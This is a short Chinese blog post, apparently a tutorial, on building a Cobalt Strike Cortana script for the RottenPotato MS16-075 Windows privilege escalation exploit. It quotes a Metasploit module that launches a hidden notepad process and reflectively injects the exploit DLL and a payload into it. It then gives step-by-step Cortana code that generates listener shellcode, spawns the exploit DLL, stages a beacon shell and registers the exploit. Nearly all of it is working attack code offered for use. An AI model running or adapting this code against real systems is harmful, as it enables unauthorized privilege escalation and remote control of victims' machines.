水文…看看就好…
cortana编写手册
rottenpotato.dll

流程

msf的模块

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
 if my_target.opts['Arch'] == 'x64'
dll_file_name = 'rottenpotato.x64.dll'
vprint_status("Assigning payload rottenpotato.x64.dll")
elsif my_target.opts['Arch'] == 'x86'
dll_file_name = 'rottenpotato.x86.dll'
vprint_status("Assigning payload rottenpotato.x86.dll")
else
fail_with(Failure::BadConfig, "Unknown target arch; unable to assign exploit code")
end
print_status('Launching notepad to host the exploit...')
notepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true)
begin
process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
print_good("Process #{process.pid} launched.")
rescue Rex::Post::Meterpreter::RequestError
print_error('Operation failed. Trying to elevate the current process...')
process = client.sys.process.open
end
print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
library_path = ::File.join(Msf::Config.data_directory, "exploits", "rottenpotato", dll_file_name)
library_path = ::File.expand_path(library_path)
print_status("Injecting exploit into #{process.pid}...")
exploit_mem, offset = inject_dll_into_process(process, library_path)
print_status("Exploit injected. Injecting payload into #{process.pid}...")
payload_mem = inject_into_process(process, payload.encoded)
# invoke the exploit, passing in the address of the payload that
# we want invoked on successful exploitation.
print_status('Payload injected. Executing exploit...')
process.thread.create(exploit_mem + offset, payload_mem)
print_good('Exploit finished, wait for (hopefully privileged) payload execution t+o complete.')
end
end

流程:对应位数选择dll>创建一个notepad进程>将提权dll注入进程>将payload注入进程>调用exp进行提权反弹shell

构造corana

→_→,手册有给出例子,不过我这还是一段一段的来说,如有不懂,自行看手册

  • 1.首先选择一个listener来生成shellcode

    1
    2
    btask($1,listener_describe($2));
    $stager = shellcode($2, false, "x64");
  • 2.使用cs提供的反射dll注入选项

    1
    2
    bdllspawn!($1, script_resource("rottenpotato.x64.dll"), $stager, "ms16-075", 5000);
    //script_resource即Cortana路径
  • 3.进行连接shell

    1
    bstage($1, $null, $2, "x64");
  • 4.再套上模版…

    1
    2
    3
    4
    5
    6
    7
    8
    sub ms16_075_exploit 
    {
    btask($1,listener_describe($2));
    $stager = shellcode($2, false, "x64");
    bdllspawn!($1, script_resource("rottenpotato.x64.dll"), $stager, "ms16-075", 5000);
    bstage($1, $null, $2, "x64");
    }
    beacon_exploit_register("ms16-075", "test", &ms16_075_exploit);

kv7eAS.jpg